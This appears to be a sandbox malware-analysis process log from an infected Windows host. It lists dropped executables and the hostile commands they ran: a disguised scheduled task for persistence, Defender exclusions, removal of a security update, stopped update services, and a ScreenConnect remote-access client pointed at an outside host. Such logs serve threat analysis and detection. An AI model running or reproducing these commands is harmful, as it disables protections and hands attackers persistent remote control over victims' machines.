C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:1004
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:3524
-
-
C:\Windows\System32\dwm.exeC:\Windows\System32\dwm.exe2⤵PID:2028
-
-
C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pifC:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif2⤵PID:2744
-
-
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe1⤵
- Executes dropped EXE
PID:3156
-
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe1⤵
- Executes dropped EXE
PID:1044
-
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:876
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:884
-
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe1⤵
- Executes dropped EXE
PID:4740
-
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe1⤵
- Executes dropped EXE
PID:1004
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4848 -ip 48481⤵PID:2348
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4468 -ip 44681⤵PID:4928
-
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe1⤵
- Executes dropped EXE
PID:1244
-
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe1⤵
- Executes dropped EXE
PID:2208
-
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe1⤵
- Executes dropped EXE
PID:764
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Boot or Logon Autostart Execution: Authentication Package
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
PID:3256 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F3FD84A91624CE65960EB9CC6DEDC722 C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5008 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI91CE.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241080453 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1336
-
-
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:6092
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding CF5831D0E8518FC77F67C9B3859A11252⤵
- System Location Discovery: System Language Discovery
PID:5812
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 82EBABD0359BB19B907B788469303A45 E Global\MSI00002⤵
- Drops file in Windows directory
PID:4524
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:5284
-
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe1⤵PID:1336
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵PID:180
-
C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.exe"C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=fnback9636.site&p=8041&s=dff84209-b7dc-448b-8fd8-d772cabe318e&k=BgIAAACkAABSU0ExAAgAAAEAAQA9jYIrttwwC%2fVG8pSgng7hOaOxKOcglvdFFtkWeOWtX8fqsZgIKfVrWuN3su1CgiFbvlCYAExDue6opAYsm4ZcU%2fXlAy9prKBw8dHgYIr5MKTVcZ179o9h8%2f%2bnJY4jOeDKVmcK57L%2fEAFTuKdJ4YjAwIneAffDLjer1Vf%2banxJ%2b%2fQG9GXKFTsCbQPC0DPoXGR4nhNlJsUIT37D9pxvtL82%2fbs5OFG6ebhQ2MBDFYY21oOxjFRMMIWi2Owda95WULvij7v9vchg4Zacetd90xJGtyFFMUL53dS%2fRJ%2bjUcnwVvLNyKx3HwIoiBSP6LM2Nm5EN5LWd0R%2b3hStk2Qltk%2bh"1⤵
- Sets service image path in registry
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:3164 -
C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsClient.exe" "RunRole" "cce1306d-e7ab-4219-bf52-82c99d2b1aa6" "User"2⤵PID:6132
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1468 -ip 14681⤵PID:5152
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5644 -ip 56441⤵PID:3720
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5976 -ip 59761⤵PID:3924
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe1⤵PID:5612
-
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe1⤵PID:4936
-
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe1⤵PID:6096
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exeC:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe1⤵
- System Location Discovery: System Language Discovery
PID:6092 -
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:6140
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:4756
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:6032
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:2344
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:1732
-
-
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe1⤵PID:5160
-
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe1⤵PID:5608
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe1⤵PID:1612
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exeC:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe1⤵PID:4744
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:1640
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:1332
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:1680
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:2168
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:2468
-
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe1⤵PID:548
-
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe1⤵PID:3940
-
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe1⤵PID:2280
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exeC:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe1⤵PID:5416
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:5004
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:6600
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:6624
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:5644
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:7920
-
-
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe1⤵PID:4580
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe1⤵PID:180
-
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe1⤵PID:1960
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:6300
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2384 -ip 23841⤵PID:2396
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2384 -ip 23841⤵PID:5160
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2384 -ip 23841⤵PID:7320
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2384 -ip 23841⤵PID:7964
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2384 -ip 23841⤵PID:7120
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2384 -ip 23841⤵PID:8072
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2384 -ip 23841⤵PID:6548
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2384 -ip 23841⤵PID:1508
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2384 -ip 23841⤵PID:8040
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2384 -ip 23841⤵PID:5864
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6884 -ip 68841⤵PID:6444
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 6884 -ip 68841⤵PID:7024
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 6884 -ip 68841⤵PID:6592
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6884 -ip 68841⤵PID:6404
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6884 -ip 68841⤵PID:8120
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6884 -ip 68841⤵PID:4836
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 6884 -ip 68841⤵PID:8016
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 6884 -ip 68841⤵PID:2384
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 6884 -ip 68841⤵PID:5412
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 6884 -ip 68841⤵PID:6216
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 6884 -ip 68841⤵PID:6272
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6884 -ip 68841⤵PID:1460
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6884 -ip 68841⤵PID:7764
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6884 -ip 68841⤵PID:7440
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 6884 -ip 68841⤵PID:7020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 6884 -ip 68841⤵PID:1332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 6884 -ip 68841⤵PID:6244
-
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exeC:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe1⤵PID:7612
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7612 -s 4402⤵
- Program crash
PID:2876
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exeC:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe1⤵PID:5580
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:7452
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:6592
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:2384
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:5716
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:8200
-
-
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe1⤵PID:7400
-
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe1⤵PID:4508
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe1⤵PID:180
-
C:\ProgramData\axaso\bkujn.exeC:\ProgramData\axaso\bkujn.exe1⤵
- Suspicious use of SetThreadContext
PID:5976 -
C:\ProgramData\axaso\bkujn.exe"C:\ProgramData\axaso\bkujn.exe"2⤵
- System Location Discovery: System Language Discovery
PID:6660
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 7612 -ip 76121⤵PID:5968
-
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exeC:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe1⤵PID:9076
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9076 -s 4402⤵
- Program crash
PID:7212
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exeC:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe1⤵PID:9100
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:1640
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:6028
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:7272
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:6420
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:7908
-
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe1⤵PID:9152
-
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe1⤵PID:8008
-
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe1⤵PID:6984
-
C:\ProgramData\axaso\bkujn.exeC:\ProgramData\axaso\bkujn.exe1⤵
- Suspicious use of SetThreadContext
PID:9188 -
C:\ProgramData\axaso\bkujn.exe"C:\ProgramData\axaso\bkujn.exe"2⤵PID:6156
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 9076 -ip 90761⤵PID:8060
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 6884 -ip 68841⤵PID:3220
-
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exeC:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe1⤵PID:8092
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8092 -s 4402⤵
- Program crash
PID:7080
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exeC:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe1⤵
- System Location Discovery: System Language Discovery
PID:7308 -
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:9084
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:5184
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:6960
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:8132
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:4324
-
-
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe1⤵PID:7052
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe1⤵PID:5948
-
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe1⤵PID:7704
-
C:\ProgramData\axaso\bkujn.exeC:\ProgramData\axaso\bkujn.exe1⤵
- Suspicious use of SetThreadContext
PID:6224 -
C:\ProgramData\axaso\bkujn.exe"C:\ProgramData\axaso\bkujn.exe"2⤵PID:9176
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 8092 -ip 80921⤵PID:6692
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6884 -ip 68841⤵PID:3356
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6884 -ip 68841⤵PID:5348
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 6884 -ip 68841⤵PID:6360
-
C:\ProgramData\Google\Chrome\updater.exeC:\ProgramData\Google\Chrome\updater.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7668 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
PID:6096
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:8852
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:3460
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:8140
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:4188
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:5884
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:7012
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:6284
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
PID:4540
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
PID:3640
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
PID:7308
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
PID:8968
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:5528
-
-
C:\Windows\explorer.exeexplorer.exe2⤵PID:1344
-
C:\Users\Admin\AppData\Local\Temp\Files\Ewpeloxttug.exe"C:\Users\Admin\AppData\Local\Temp\Files\Ewpeloxttug.exe"3⤵PID:6036
-
-
-
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exeC:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe1⤵PID:6184
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6184 -s 4402⤵
- Program crash
PID:8732
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exeC:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe1⤵PID:7376
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:9224
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:6232
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:7748
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:5600
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"2⤵PID:9536
-
-
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe1⤵PID:5320
-
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe1⤵PID:8052
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe1⤵PID:8484
-
C:\ProgramData\axaso\bkujn.exeC:\ProgramData\axaso\bkujn.exe1⤵PID:4936
-
C:\ProgramData\axaso\bkujn.exe"C:\ProgramData\axaso\bkujn.exe"2⤵PID:8428
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6184 -ip 61841⤵PID:8664
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6884 -ip 68841⤵PID:10080
-
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exeC:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe1⤵PID:5836
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5836 -s 4402⤵
- Program crash
PID:6512
-
-
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe1⤵PID:936
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6264 -ip 62641⤵PID:7640
-
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe1⤵PID:9060
-
C:\ProgramData\axaso\bkujn.exeC:\ProgramData\axaso\bkujn.exe1⤵PID:7364
-
C:\ProgramData\axaso\bkujn.exe"C:\ProgramData\axaso\bkujn.exe"2⤵PID:6668
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6884 -ip 68841⤵PID:8520
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5836 -ip 58361⤵PID:8900
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 6884 -ip 68841⤵PID:9776
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exeC:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe1⤵PID:5724
-
